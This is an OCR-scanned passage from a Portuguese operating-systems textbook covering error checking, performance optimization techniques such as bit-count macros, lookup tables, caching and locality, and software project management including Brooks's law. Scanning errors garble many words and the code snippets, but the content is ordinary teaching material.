do algo devc ser procurado, Sc o niimero dc entradas e pe- 
qucno (digamos, me nos de mil), o ganho pela ordenaęao da 
tabela ou pelo uso de uma ftmęao de ordenaęao e pequeno, 
mas o código e bem mais comp3exo e mais passfvel de erros. 

Obviamcntc, para funęóes que estejam no caminho 
crftico — como um chavcamcnto dc contcxtos —, tudo 
dcve ser fcito para toina-las rapidas, mesmo que f para isso, 
elas precisem ser cscritas em linguagem asscmbly {Deus 
nos livre), Mas as partes gran des do sistema nao estao no 
caminho crftico. Por exemplo, muitas chamadas de sistema 
raramente sao chamadas, Se houver um fork a cada segun- 
do e este levar 1 ms para executar, entao, mesmo que ele 
seja otimizado para 0, o ganho sera de apenas 0,1 por cen- 
to. Se o código otimizado e maior e tern mais erros, pode 
nao ser interessante se import ar com a otimizaęao. 

Primeiro verificar os erros 

Muitas chamadas de sistema podem falliar por uma 
serie de razoes: o arquivo a ser aberto pertence a outro 
usuario; a criaęao de processos falha porąue a tabela de 
processos esta cheia; ou um smal nao pode ser enviado 
porque o processo-alvo nao existe. O sistema operacional 
deve ved£car cuidadosamente cada possLvd erro a mes de 
e xecu i a r a cha ma d a. 

Muitas chamadas de sistema tambem requerem a aqui- 
sięao de recursos, como as entradas da tabela de processos. 
as entradas da tabela de i-nodes ou desedtores de arquivos. 
Um conselho geral que pode evitar multa dor de cabeęa e 
primeiro verificar se a chamada de sistema pode de fato ser 
reallzada antes da aquisięao de qualquer recurso. Isso signi- 
fica colocar todos os testes no infcio da rotina quc executa a 
chamada dc sistema. Cada teste deve ser da forma 

if (error^condition) return(ERROR_CODE); 

Se a chamada conseguir passar pelos testes em todo o 
caminho, entao da certa menie sera bem-sucedida. Nessc 
monter to, os recursos podcm ser adquindos. 

Imercalar os testes com a aquisięao de recursos implica 
que, se algum teste falhar ao longo do caminho, todos os 
recursos adquiridos atc aqucic ponto deverao ser devoIvi- 
dos. Se um erro ocorre e algum recurso nao e dcvolvido, 
ncnłium dano e causa do de imediato. Por cxcmplo, uma 
entrada da tabela de processos pode simplesmcnte tornar- 
-sc permaneniememe indisponivcL No entanto, dentro de 
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um ceno perl od o de tempo, esse erro pode ocorrer niul- 
tiplas vezes. Por firn, a maior parte das entradas da tabela 
de processos pode se tornar indisponwd, levando a unia 
quebrn do sistema — quebra muitas vezes imprevisivd e 
dc di fi dl depurnęao. 

Diversos sistemas sofrem desse problema, que se mani- 
festa na forma de perda de memória. Em geral, o programa 
chama malloc para alocar espaęo, mas esąuece de cha mar 
free posteriormente para libera-la. Aos poucos, toda a me¬ 
mória desaparece ate que o sistema seja reinidalizado. 

En gier et al (2000) propuseram um modo interessan- 
ie para a verificaęao de alguns desses erros em tempo de 
compilaęao. Eles observaram que o programador conhece 
muitas invariantes que o compilador nao conhece — como 
ąuando voce aplica um lock em um mutex: todos os ca^ 
minhos a partir desse lock devem comer um unlock e mais 
tienhum outro lock sobre o inesmo mntex. Eles criaram 
um jeito de o programa dor dizer isso ao compilador, 
instruindo-o a yerificar todos os caminhos cm tempo dc 
compilaęao para as vlolaęócs daqucla iiwariantc. O pro- 
gra mador pode tambem, entre muitas out ras condięocs, 
cspedficar que a memória alocada deve ser liberada cm 
todos os caminhos. 


13.4 


Desempenho 


Considcrando que Lodas as cara etc list icas Sao iguais, 
um sistema operadonal rapido e melhor do que um lento. 
No cmanto, um sistema operadonal rapido e nao confia- 
vel nao e tao bom quanto mn outro lento e conftavel. 
Visto que as otimizaęoes complexas muitas vezes geram 
erros, e importame usa-las com camela. Apesar disso, ha 
locais em que o desempenho e critico e as otimizaęoes sao 
bem importantes e, assim, todo o esforęo e valido, Nas 
seęóes a seguir, veremos aigumas tecnicas gerais para me- 
lhorar o desempenho nos pontos em que as otimizaęoes 
sao necessarias. 


_ 13.4.11 Por que os sistemas operadonais 

sao lentos? 

A mes dc falar sobre as tecnicas de otimizaęao, e im- 
portante destaear que a lentidao de muitos sistemas ope¬ 
radonais e causada em grandę parte por eles próprios. 
Por exemplo, antigos sistemas operadonais, como o MS¬ 
-DOS e a versao 7 do UN1X, iniciaUzavam em poucos 
segundos, Os sistemas U Ml X e Windows Vista moder- 
nos podem levar minutos para inicializar, mesmo que 
cxccutcm cm hardware mil vczcs mais rapido, A justi- 
ficativa 6 quc eles estao fazendo muito mais, qucrcn- 
do on nao. Veja um caso em questao. O recurso pług- 
andplay torna mais facil i usta lar um novo dispositivo de 
hardware, mas o preęo pago e que, em cada inirializaęao, 
o sistema operadonal tern de inspecionar todo o hardware 


para averiguar se existem novos dispositivos. Essa varre- 
dura do barramento ieva tempo. 

Uma alternativa (melhor, na opiniao do autor) seria 
remover o recurso pług and play e manier um fcone na tela 
dizendo Instalar novo hardware". Na instalaęao de um 
novo disposilivo de hardware, o usuario deveria dicar nes- 
se icone para iniciar a varredura do barramento, em vez 
de faze-la em cada inirializaęao. Os projetistas dos sistemas 
atuais estavam cicrucs dessa opęao, obvia menie, Eles a re- 
jritaram, basieamente, porąue presumiram que os usuarios 
sao bastante estupidos c incapazcs dc fazer essa opera ca o 
corretamcnte (mas e claro quc diriam isso mais gentil men¬ 
ie aos usuarios). Esse e apenas urn exemplo, mas existein 
muitos outros, cm que o desejo dc tornar o sistema a miga- 
vel ao usuario' (ou dumne a idiotas', dependendo do ponto 
de vista) torna-o lento para todos. 

Provavd menie a linka grandę coisa quc os projetistas 
de sistemas podem fazer para md hora r o desempenho c 
serem muito mais selelivos na adięao de novas caracterfs- 
ticas. A perguma que devemos fazer nao e "Os usuarios 
gostarao disso?", mas "Esta caracterfstica vale o preęo ine- 
vitavel a ser pago no tamanho do códlgo, em velocidade, 
complexidade e confiabilidade?*. Somentc ąuando as van- 
tageus da ra men te pesam mais do que as desvantagen$ e 
quc a caractcnstica dcvc ser induida. Os programadores 
tendcm a presuiuir quc o tamanho do código e o contador 
de erros serao 0 c a vdocidade sera infinita, A cxperiencia 
mostra que essa vtScio e um tamo olimisla, 

Outro fator importante e o marketing do produto. No 
memento em quc a vcrsao 4 ou 5 dc algum produto atin- 
giu o mercado, provavdmcnte lodas as cara cle risticas real- 
mente titdsja foram indiiidas ea maioria das pcssoas que 
prćcisam desse produto ja fol compra-lo. Para manier as 
vendas em andamento, muitos fabricantes, apesar disso, 
continuam produzindo novas versóes, com mais caracie- 
risticas, podeń do, assim, vender suas atualizaęoes a seus 
che mes. Adicionar novas caraaeristicas só por adicio- 
nar pode aj u dar nas vendas H mas ra ranienie mci hora o 
desempenho. 


13A21 O ąm deve ser otimizado? 

Como regra, a primdra vcrsao de urn sistema deve ser 
tao dii eta ąuanto possfyd. As unicas otimizaęoes devem 
ocorrer nas parłeś que obviamente podem causar próbie- 
mas inevitaveis. Ter uma caclie de blocos para o sistema 
de arquivos e um exemplo. Uma vez que o sistema esta 
ativo e em execuęao, medidas cautelosas predsam ser to- 
madas para ver onde o tempo esta nalmente sendo gasto. 
Com basc nesses numeros, otimizaęoes devern ser feitas 
nos pontos em quc forem mais necessarias. 

His uma historia verdadeira em que uma otimizaęao 
mais danificou do que ajudou: um dos alunos do autor (o 
qtial manterei no anonimato) escreveu o programa mkfs do 









Sn#w 


Capitulo 13 Pro jęto de sistemas operadonais 609 


MINIX. Esse próg rama cria um novo sistema de arquivos 
em um disco recem-fermata do. O estudante levou cerca de 
seis meses para otimizar esse programa, indusive inserindo 
o uso de caclie do disco. Quando de executou o programa. 
cste nao fundonou c prcrisou de varios outros meses dc 
depuraęao* Esse programa gcraimcntc cxecuta u ma dni- 
ca vcz no disco ngido durantc loda a vida do computador, 
quando o sistcma 6 imtalado, Alem disso, exccuta urna 
unica \xz para cada disco fkxiVd que e forma ta do, Cada 
execuęao gasta em lorno de dois segundos. Mesmo que a 
versao nao otimizada gastasse um minuto, mosiiou-se um 
desperdido de recursos gastar tamo tempo oiimizando um 
programa raramente usado. 

Um slogan quc pode ser aplicado a otimizaęao dc dc- 
sempenho e: 

0 ąue i bom o bastmte i bom o bastante, 

Com isso, entendemos que, urna vez que o deseni- 
penho alcanęou um mvel razoavd, provavelmenie nao 
valera a pena o esforęo c a complexidade para melhorar 
mais alguns poucos percentuais. Se o a I go m mc dc escalo- 
namento esia razoavelmente justo e mantem a CPU ocu- 
pada 90 por cento do tempo, de esla fazendo seu irabalho, 
Invenlar outro muito mais comp!exo que seja 5 por cento 
melhor provavdmcntc sera urna ma ideia. Da nicsma ma- 
ncira, se a taxa de paginaęao esta baka o suficiente e nao e 
um gar galo, urna grandę empreitada que busąue melhorar 
o desempenho nao vale a pena. Evitar desastres e muito 
mais importante do que otimizar o desempenho, especial- 
mente visto que aąuilo que e ótimo sob determinada carga 
de trabalho pode nao ser ótimo sob outra. 

13.4.51 Ponderaęoes espaęo/tempo 

Utną abordagem geral para melhorar o desempenho 
consiste em pondemr o tempo wrsus o espaęo. E freąucnte 
em dencia da computaęao unia situaęao dc cscolha entre 


um algorinno que usa pouca memória, mas e lento, e oit- 
tro algoritmo qne usa muito mais memória, porem e mais 
rapido. Quando se faz urna otimizaęao importante, vale a 
pena procurar por algoritmos qtse ganham veloddade com 
o uso de mais memória o u, de modo opos to, cconomizam 
memória preciosa com a realizaęcio de mais computaęao. 

U ma tccnica cm geral titil visa substituir proccdimcn- 
tos pequenos por ma eros, O uso de ma eros elimina a so- 
brecarga normalnienie assodada a unia chamada de pro- 
ccdimemo. O ganlio e cspecialmenie significativo ąuando 
a diamada ocorre dentro dc um laęo. Como cxcmp3o, su- 
ponha que usemos inapas de bits para manier o controle 
dos recursos e precisemos saber com freąuencia quantas 
unidades estao llvres em alguma parte do mapa de bits. 
Para isso, lorna-se necessario um procedimemo, bitj&unt, 
que eon La o nu mero de bits I em um byle. Um proce di ~ 
mento direto e da do na Figura 13*7(3}. Ele circula sobrc 
os bits do by te, contando-os um por vez. 

Esse procedimemo possui duas fontes de ineficiencia, 
Primeiro, cle deve ser chainado P urn espaęo na piliia dcve 
ser alocado para ele e depois ele deve ret oma r. Cada cha- 
mada desse procedimemo apresema sobrecarga. Em se- 
gundo lugar, ele contem um laęo e sempre existe alguma 
sobrecarga assodada a um laęo. 

Urna estrategia complctamente diferente e usar a ma- 
cro da Figura I3J(b). ć urna express t io em sequenda que 
calcula a soma dos bits por meio de deslocamemos succssi^ 
vos do argumento, noascarando tudo, cxceto o bit dc ordem 
mais baixa, e somando os oito termos* A ma ero dihdlmen- 
te e um trabalho de arie, mas da aparece no código somen- 
te urna vez. Quando a macro e diamada, por exemplo, por 

sum ^ biLcount(tabte[i)); 

da parcce identica a diamada de rotina. Assim, a nao ser 
pela definlęao um tamo ąuanto complicada, o código nao 
fi ca piór com o uso de macro do que com o uso de rotina. 


fldefine BYTE_SIZE e 
int bit_count(int byte} 

{ 

int i, count = 0; 

tor (i s 0; i < Bne_Sl2E; i++) 

\f ((byle »i) & 1) count++; 
return(count); 

1 

(a) 


r Um by te contem 8 bits*/ 

r Gonta os bits em um byte V 

r circuJa pefos bits de um byte V 
f* se este bit e 1 „ inerementa contador V 
r ret o ma soma V 


/* Macro que soma os bits em um byte e retorna a soma. Y 
ttdefine bit_count(b) ((b&i) + ((b»i }&1) + ((b»£)&i) + {{b»3)&i) + \ 
«b»4)&1) + ({b>>5)&1) + ({b»6)&1) + ((b»7)&1)) 

<b) 

r Macro que consulta o contador de bits em uma tabela, V 

char bits[256] = (0,1, 1, 2, 1, 2, 2, 3,1, 2, 2, 3, 2, 3 P 3, 4,1,2, 2, 3, 2. 3, 3, ...}; 

#deline bit_count(b} (int) bitsfb) 

(c) 


I Figura 13.7 (a) Um procedimento para contar bits em um byte. (b) Uma macro para contar bits, (c) Um macro que conta bits pela 
consulta a uma tabela. 
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mas ele se torna muito mais eficieme, visto que darnina 
tanto a sobrecarga da chamada de rolina ąuanto aquela 
causada pelo uso de laco. 

Podemos lcvar cssc exemplo um passo mais adiante. 
Para que computar o contador de biis? Por que nao pro- 
cura-lo em unia tabela? A finał de contas, ocistem somente 
256 bytes diferemes, cada um com um valor unico entre 0 
e 8. Podemos dedarar urna tabela de 256 eniradas, bits, com 
cada entrada inicializada (em tempo de compilaęao) com o 
contador de bits correspondente aąuele valor do byte. Com 
cssa tatica, nenhuma computaęao e necessaria cm tempo 
de cxccuęao, mas apenas urna operaęao dc indexaęao. Urna 
macro quc rcaliza essc tia bal ho ć dada na Figura 13.7(c). 

Trata-se de um exemplo mtido de ponderaęao entre 
o tempo de computaęao e o uso de memória. Contudo, 
podemos ir mais adiante ainda. Se ąuisermos eon tar os 
bits cm palavras de 32 bits, usando rtossa macro bitjzount, 
precisaremos executar quatro pesquisas por palavra* Se 
expandirinos a tabela para 65.536 entradas, poderemos 
reduzir para duas pesquisas por palavra, com o custo dc 
uma tabela muito maion 

A procura de respostas em tabelas pode ser usada de 
outras maneiras. Por exemplo, no Ca pitni o 7 vimos como 
a compressao de imagens JPEG fu n do na f empregando 
iransformąędes discretas de cosscnos bastante complexas. 
Uma tecnica de compressao altemativa, GIF usa a consul- 
ta em tabela para codificar pixels RGB de 24 bits, Entre- 
tanto, a GIF só funciona sobre imagens de 256 cores ou 
menos. Para cada iinagem a ser comprimida, uma palheta 
de 256 entradas e construfda, e nela cada entrada eon tern 
um valor RGB de 24 bits. A imagem comprimida consiste, 
eman, ejn um fndice de S biis para cada pixel em vez de um 
valor de 24 bits para cada cor — um ganho em [ator de 
tres, Essa idei a e i lustra da na Figura 13.8 para uma seęao 
4 x 4 de uma imagem, A imagem comprimida original e 
mostrada na Figura 13,8(a). Cada valor aqui c um valor de 
24 bits, e cada um dos 8 bits da a intensidadc do vermelho. 


do verde e do azul. A imagem GIF e mostrada na Figura 
13.8(b). Nesse caso, cada va1or e um mdice de S bits para a 
palheta de cores. Esta e armażenada como parte do arqui- 
to de imagem e e mostrada na Figura 13.8(c). Na verdade, 
ha mais coisas a menrionar sobre a GIF mas o cenie da 
ąuestao ć a pesąuisa em tabela, 

Existe outro modo de reduzir o tamanho da imagem, 
o qual ilustra uma ponderaęao diferente. O PostScript e 
uma linguagem de programaęao que pode ser usada para 
descrever imagens. (De fato, qualquer linguagem de pro- 
gramaęao pode descrever imagens, mas o PostScript e mo- 
dclado para csse propósilo.) Muitas impressoras tern um 
interpretador PostScript embutido, a Mm dc cxccutar pro¬ 
gi amas PostScript enviados a das. 

Por exemplo, se existe um bloco retangular de pixels 
em uma imagem, todos com a mesma cor, um progra- 
ina PostScript para a referida imagem deve executar ins- 
truęoes para desenhar um retangulo em certa posięao e 
depois precnclie-lo com uma determinada cor, Somen¬ 
te alguns bits sao ncccssarios para cmitir csse comando, 
Guandoa imagem c rccebida pda impressora, um inter¬ 
pretador local deve executai o programa para construir a 
imagem. Assim, o PostScript rcaliza a compressao de da- 
dos sob pena dc um custo maior dc computaęao — uma 
ponderaęao diferente daąuela reaiizada por meio de pes- 
quisa em tabela, mas muito valiosa quando a memória ou 
a Jargura de banda e escassa, 

Outras pondcraęocs muitas vezes cnvolvcm estrulu- 
ras de dados, As listas duplamente encadeadas u sam mais 
memória do qite as listas simplesmcnte encadeadas, mas 
frequememente permitem acesso mais rapido aos itens. As 
tabelas de espalhamento sao ainda mais esbanjadoras de 
espaęo, mas ainda mais rapidas. Em resumo, um dos prin- 
cipais fatores a serem considerados ao otimizar uma parte 
de código e ponderar se o uso de diferentes estnituras de 
dados proporcionara uma melhor relaęao custo-benefido 
cm termos de espaęo/tempo. 


24 bits 


3,8,13 

33,13 

26,4,9 

90,2,6 

3,8,13 

3,8,13 

4,19,20 

4,6,9 

4,6,9 

10,30,8 

53,1 

22,23 

10,11,5 

4,2,17 
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8 bits 
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24 bits 


11 

66.4,43 

10 

5,8.1 

9 

4,2,17 

8 

10,11,5 

7 

33,13 

6 

90,2,6 

5 

10.30,8 

4 

4,6,9 

3 

4,19,20 

2 

88,4,3 

1 

26,4,9 

0 

22,2,0 


(C) 


I Figura 13.8 [&) Parte de oma imagem nao comprimida com 24 bits por pixel. (b) A mesma parte comprimida com GIF, com oito bits 
por pixei. (c) A palheta de cores. 
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13.4.41 Uso de cache 

Urna tecntca bem conhecida para mclhora dc deseni- 
penho e o uso de cache. Ela e aplicavel sempre que exisiir 
a próbabtlidade de o mcsmo resuliado ser necessario varias 
yezes. A abordagem gcral e Eazer o trabalho todo da pri- 
nicira vcz e depois guardar o resuliado cm u ma cache. Nas 
tcntalivas subscąuenies, a cache d verilkada em primeiro 
lugar. Sc o resuliado cstivci ocla, cle sera osado. Caso con- 
trario, o trabalho lodo sera refcito. 

Ja vimos o uso de cache demro do sisiema de arqulvos 
para coiuer certa quanlidade de blocos do disco recenle- 
meme u sad os, economizando, asslm, urna feilura de disco 
a cada acerto. Com udo, as caches pod cm scrvir a muitos 
outros propósitos, Por exemplo, a analise sima tka dos no¬ 
ro es dos caminlios dc diretórios e surprccndentcmemc 
cara. Considere novamemc o excmpi.o do UNIX mosirado 
na Figura 431. Para procurar fusrfmifmboxsm necessarios 
os seguintes accssos ao disco: 

1. Ler o i-node para o direlório-raiz (i-node 1). 

2. Ler o diretório-raiz (bloco I). 

3. Ler o i-node para fusr (i-nodc 6), 

4. Lcr o direlório łusr (bloco 132}. 

5. Ler o i-nodc para łusrfast (i-nodc 26). 

6. Ler o direlório łusrfast (bloco 406). 

Essa operaęao gasta seis accssos ao disco semenie para 
dcscobrir o nu mero do i-node do arquivo. Em segnida, o 
próprio i-node deve ser lido para prover os mi mer os dos 
blocos do disco. Se o arquivo e menor do que o tamanho 
do bloco (por exemplo, L024 bytes), cle gasta oilo accssos 
ao disco para ler o dado. 

Alguns sistemas otimizam a analise siniatica do nome 
do caminho por mcio do uso de cache de combmaęoes {ca¬ 
minho, i-node). Para o excmp)o da Figura 43U a cache 
certamente coniera as primeiras tres cmradas da Tabela 
13.1 após analisar iusrfastfmhoK. As tlliimas ires cmradas 
siu gem da analise de outros caminlios. 

Quando um caminho prccisa ser procurado, o ana- 
lisador de nom.es primeiro consuita a cache, procurando 
nela a maior subcadeia a li prcscntc. Por exemplo, se o 


Caminho 

Numero do i-node 

/usr 

6 

/usr/ast 

26 

/usr/ast/mbox 

60 

/usr/ast/books 

92 

/usr/bal 

45 

/usr/bal/paper.ps 

35 


I Tabela 13.1 Parte da cache de i-nodes para a Figura 4.31. 
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caminho fusr/astfgrantsfstw e submetido, a cache ret om a a 
informaęao dc quc a subcadeia łusrfast ć o i-nodc 26, per- 
mitindo que a pesguisa possa inidaltzar nele r eliminando 
quairo acessos ao disco. 

Um problema com o uso de cache de caminlios e que 
o mapcamento entre o nome do arqmvo e o nu mero do 
i-nodc nao e fixo durante todo o tempo. Suponha que o 
arquivo łttsrhi$Unthox seja removido do sistema e scu i-node 
seja rcutilizado para um arquivo diferente pertencente a 
um usuario diferente. Posleriormcme, o arqihvo fusriaslf 
mbox e criado de novo e r nesse momenio, recebe o numero 
de i-node 106, Se nada for leito para evilar essa situaęao, 
a entrada da cache estara, entao, incorreta e as procuras 
subsequemes retornarao um numero dc i-nodc errado. Por 
essa razao, ąuando se rcmove um arquivo ou um diretório, 
sua entrada na cache e (caso seja um direlório) todas as 
emradas abaixo dela devem ser Jinipas da cache. 

Os blocos do disco e os nomes dos caminhos nao sao os 
unicos itens que podem ser colocados cm cache. Os i-nodes 
tambem o podem. Se ihreads pop-ups sao usados para tra¬ 
ta i imerrupęoes, cada um deles reąuer uma pi lita c algum 
mecanismo adicional. Esses threads previamente usados 
tambem podem ser colocados na cache, visto que o apro- 
ydtamento dc um thread ja usado e mais facil do que a 
criaęao de um iioyo a partir do zero (para evitar a alocaęao 
de memória). Basicamenie, qualquer coisa diffcil de produ- 
zir pode ser eolocada na cache. 

134.51 Dicas 

As entradas na cache estao sempre corretas, Uma pes- 
quisa na cache pode falhan mas, se uma entrada e encon* 
trada, da leni □ garamia de estar correta e pode ser usada 
sem mais cerimónia, Em alguns sistemas, c convcnicntc ter 
uma tabela de dicas, que sao sugcstócs sobrc a soluęao, 
mas sem ga ramia dc estarem ccrtas. O próprio cha mad or 
devc verificar se o resultado 6 correto. 

Um exemplo bem conhecido dc dicas c o uso dos URLs 
embutidos nas pagmas da Web. O cliąue em um link nao 
garante que a pagina apontada esteja presente. Na reali- 
dadc, a pagina aponlada pode ter sido reinovida dcz anos 
antes. Assim, a informaęao sobre a indicaęao da pagina re¬ 
alnienie e apenas uma di ca, 

As dicas tambem sao empregadas na conexao com ar- 
quiVos fc molos. A informaęao 6 uma dica que diz algo so¬ 
brc o arquivo remoto, como onde ele esta 1 ocal i zad o. Con- 
ludo, o arquivo pode ler sido movido ou removido desde 
o registro da dica, de modo que uma verilicaęao sempre e 
nccessaria para conti miar se a dica es la correta. 

13.4.61 Exploraęao da localidade 

Processos e programas nao agem aleatoriamente. Eles 
apresentarn uma quantidade razoavcl de localidade no 
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tempo e no espaęo e essa informaęao pode ser explora- 
da de varias maneiras para melhorar o desempenho. Um 
excmp!o bom eonliccido dc loealidade cspacial ć o lato de 
que os processos nao saltam aleatoriamente dentro de seus 
espaęos de enderecamento, mas tendem a nsar nm mimero 
relalivameme pcąneno de paginas dnrante um dado in- 
lervalo de tempo, As paginas que um processo esta usan- 
do atWamenie po dem ser marcadas como seu conjunto de 
trabalho {workuj set) c o sistenia opcradonal pode garantir 
quc, quando o processo tiver a permissao de ex ecu tar, seu 
conjunto de trabalho estara na memória, reduzindo, assim, 
o nu mero de faltas de paginas. 

O prineipio da localidadc tambem se aplica aos arqui- 
vos. Quando um processo seleciona um diretório espeeffi- 
co dc trabalho, e provavd quc muitas dc suas referendas 
futuras a arquivos sejam para arquivos daąude diretório, 
Colocar todos os i-nodes e os arquivos de cada diretório 
juntos no disco propordona melhoras no desempenho. 
Esse principia c o utilizado no Berkeley Fast File System 
(McKusick et aL 1984). 

Outra area na qual a localidadc exerce um papel im- 
portante e a de escalonamenio dc ihreads cm multipro- 
cessadores. Como vimos no Capftulo 8, urna maneira de 
escalonar threads em um multiprocessador e tentar exeoi- 
tar cada thread na mesma CPU cm quc ele foi executado 
da ultima vcz, na esperanęa de que alguns de seus blocos de 
memória ainda esiejam na cache da memória. 

15.4.71 Otimizaęao do caso comum 

Normalnienie, e u ma boa ideia diferendar entre o caso 
mais comum e o piór caso possivel c trata-los diferente- 
menie, Muitas vezes os códigos para as duas situaędes sao 
totalmeme diversos, fi importantc tornar o caso comum ra- 
pido. Para o piór caso, se ele ocorre raranieme, e suficiente 
tornado correto. 

Como um primeiro exemplo, co osi dero a entrada cm 
uma regiao crftica. Na major parte do tempo, a entrada 6 
bcm-succdida, especialmcntc ąuando os processos nao gas¬ 
łam muito tempo demro das regióes crfticas, 0 Windows 
Vista tira vantagem dessa expectativa provendo unia cha¬ 
ma da da API Win32, EnterCriticalSeetion, que atomicamente 
tesla unia condięao no modo usuario (usandoTSLou equi- 
valeme). Se o tesle e satisfatório, o processo simplesmente 
entra na regiao criLica e nenii uma chamada de nucleo se 
faz necessaria. Se o teste falha, a roli na de biblioteca exe- 
cuta um down em um semafora para bloquear o processo. 
Assim, no caso normaL nao ha a necessidade de qualquer 
chamada de nucleo. 

Como segundo exemplQ, considere o uso de um alar- 
me (usando sinais do UNIX). Se nenhum alarme se en- 
contra pendeme, fazer uma entrada e coloca-lo na fila do 
temporizador e simples e direto. Gontu do, se existe algmn 
alarme pendente, ele deve ser encontrado e removido da 
fila do temporizador. Visto que a chamada alarm nao espe- 


cifica se ja existe on nao um alarme estabelecido, o sistema 
deve assumir o piór caso. Ent ret anto, como na maior parte 
do tempo nao ha qualquer alarme pendente e visto que 
a remoęao de um alarme existente e custosa, diferendar 
entre esses dois casos pode ser bastantc iitil. 

Uma maneira de fazer isso e mant er um bit na tabela 
de processos para informar se algum alarme esta penden¬ 
te. Se o bit se encontra desligado, adota-se a soluęao facil 
(simplesmente se adidona uma nova entrada na fila do 
temporizador sem verificaęao). Se o bit esta liga do, a fila 
do temporizador dcve ser verificada. 


13.5 


Gerenciamento de projeto 


Programadores sao otimislas incorrigiveis. A maioria 
adia quc escrever um programa e corrcr ate o tedado e co- 
nieęar a digitar c, logo cm seguida, o programa totalmeme 
depurado e fhializada Para programas muito grandes, nao 
se irabalha assim. Nas seęoes seguinies, abordaremos alguns 
pornos sobre gerenciamento de grandes projeios de software, 
espedalmente projeios de grandes sistemas operadonais. 


15.5.11 o mitico homem-mes 

Em seu livro ckissico, The mythical man month , Fred 
Brooks, um dos projetistas do OS/3 60, que mais tarde in- 
gressou no mundo acadcinico, investigou por quc ć tao di- 
ffcil construii grandes sistemas operadonais (Brooks, 1975, 
1995). Quando a maioria dos programadores soubc quc 
Brooks afirmara que eles eram capazes de produzir somen- 
te mil linhas de código depurado por ano em grandes pro- 
jeios, eles indagaram se o professor Brooks estaria vivendo 
no espaęo sideral, talvez no Planeta Bug. Afinal de contas, 
a ma i orla deles se lembrava de ter produzido um programa 
de mil linhas em uma unica noite. Como isso poderia ser o 
resultado anual de algueni com um QI superior a 50? 

O que Brooks queria dizer e que os projeios grandes, 
com centenas de programadores, sao completamenie di- 
ferentes dos projeios pequenos e que os resuliados obti- 
dos em projetos pequenos nao evoluem para resuliados de 
projeios grandes. Em um projeto grandę, muito tempo e 
consumido no pianejamento de como dividir a tarefa em 
módulos, especificando cuidadosaniente os módulos e suas 
interfaces e tentando i mag i nar como esses módulos irao 
interagir, mesmo antes de comeęar a codificaęao. Em se¬ 
guida, os módulos dcvem ser implementados c dc pu rad os 
sępa rada me nie. Por lim, os módulos tern de ser imegrados 
e o sistema eompleto precisa ser testado, O caso norma! e 
cada módulo funcionar perfeitamente quando testado iso- 
ladamcme, mas o sistema ąuebra instamancatncnte ąuan¬ 
do todas as pcęas sao eolocadas juiitas. Brooks estlmou o 
trabalho como; 

1/3 plancjamcnto; 

l/ó implcmentaęao; 
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l/4teste dos módulos; 

1/4 lesle dosislema. 

Hm om ras palavras, escrevcr o códlgo e a parte faciL O 
difieil ć visualizar quais módulos devem existir e fazer coin 
qnc o módulo A converse corrcta menie com o módulo B, 
Hm um programa peąueno escrito por urn imico progra- 
niador, rudo o que Ihe resta e a parte facil. 

O iitiilo do !ivro de Brooks surgiu de sua afirmaęao 
dc que pessoas e tempo na o sao permutaycis enire sk Nao 
exi$te urna unidadc como um bomem-mes (on u ma pes- 
soa-mes). Se um projeto utiliza 15 pessoas durante dois 
a nos para ser construfdo, nao c conccbńel quc 360 pessoas 
possani faze-lo em um mes e provavdmente nao e possfvel 
ter 60 pessoas para faze-lo em seis meses. 

Exi$tem tres razoes para isso. Primdra o trabalho nao 
pode ser totalmente divldldo des de o comeęo. Ale que o 
planejamento tenha sido feito e se lenha determinado 
quais módulos sao necessarios e qnais serao suas interfaces, 
neiihum código pode ser sequer inicializado. Em um pro¬ 
jeto de dois a nos, o planejamento pode eon su mir, sozinho, 
ccrca de oito meses. 

Em segundo lugar, para utilizar totalmente um gran¬ 
dę nu mero de programadores, o trabalho deve ser dmdfdo 
em um grandę numero dc módulos, de maneira quc todos 
tenham algo para fazer. Yisto que cada módulo pode po- 
tencialmente interagir com outro, o numero de interaęoes 
mńdulo-módulo que precisa ser considerado cresce em 
funęao do quadrado do numero de módulos, i sto e, como 
o quadrado do numero dc program a dores. Essa comple- 
xidatk ra pi da men te sai de eon t role, Medięoes cuidadosas 
de 63 projetos de software confirmaram que a ponderaęao 
entre pessoas e meses esta longe de ser linear para grandes 
projetos (Bocbm, 1981). 

Hm terceiro lugar, a depuraęao e altamente sequendaL 
Estabelecer dez depuradores para um problema nao torna 
a soluęao dez vezes mais rapida. Na realidade, dez depura¬ 
dores provavdmcntc sao mais lentos do que um, pois des- 
perdięarao muito tempo cotwersando uns com os outros. 

Brooks resume sua cxpcriencia ponderando pessoas e 
tempo na lei dc Brooks: 

Aumentar o numero de envolvidos em um projeto de soft¬ 
ware airasado faz com que ek atrase ainda mak. 

O problema e qtie as pessoas que entram depois pre- 
risam ser treinadas no projeto, os módulos predsam ser 
redmdidos para se adeąuarem ao numero maior de pro- 
g rama dores agora disponweis, muitas reunloes serao neces- 
sarias para co ord en ar todos os csforęos, e assim por diante. 
Abdel-Hamid e Madnick (1991) confirmaram essa lei expc- 
rimentalmente. Urna versao irreverente da lei de Brooks e: 

Sao necessarios nove meses para gerar urna crianęa, nao 
importando ąuantas mutheres voce empregue para o 
trabalho . 
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13.5.21 Estrutura da equipe 

Sistemas operacionais comerciais sao grandes projetos 
dc software e invariavclmcntc rcquerem grandes cąuipcs dc 
pessoas, A capacidade dessas pessoas ć i mensa menie im- 
poriame, Durante decadas tem-se observado que osbonspro- 
gra ma dores sao dez vezes mais produtivos do que os progra- 
madores ruins (Sackman et ak, 1968). O preocupante e 
que, ąuando voce precisa de 200 programa dores, e difieil 
encontrar 200 bons programadores — e predso aceitar va- 
rios mveis de ąualidade demro de urna equipe + 

O que tambem c importame cm ąualąiier grandę pro¬ 
jeto, dc software ou nao r ć a neccssidade dc coerencia ar- 
ąuitelurak Deve exisiir urna menie controlando o projeto, 
Brooks cita a catedral de Reims, na Franęa, como exemplo 
de um grandę projeto que levou decadas para ser consiruf- 
do e no qual os arquitetos que chegavam posteriormente 
subordinavam seus desejos de colocar urna marca pessoal 
no projeto a realizaęao dos planos do arąuiteto inicial. O 
resultado e unia coerencia arqniietural nao encontrada em 
outras catedrab da Europa, 

Na decada de 1970, Harlan Mills combinou a observa- 
ęao de que alguns programadores sao muito mdhores do 
que os outros com a neccssidade de coerencia arquiteiural 
para propor o paradigma da eqnipe do programador- 
-chefe (Baker, 1972). Sua ideia era organizar urna equipe 
de programami o como urna equipe cirurgica, em vez de urna 
equipe de abatedores de porcos: em vez dc sairem todos gol- 
peando como loucos, u ma pessoa segura o escalpo e todos 
os outros estao la para dar su porte. Para um projeto dc dez 
pessoas, Mills sugere a estrutura de equipe da Tabela S 3.2. 

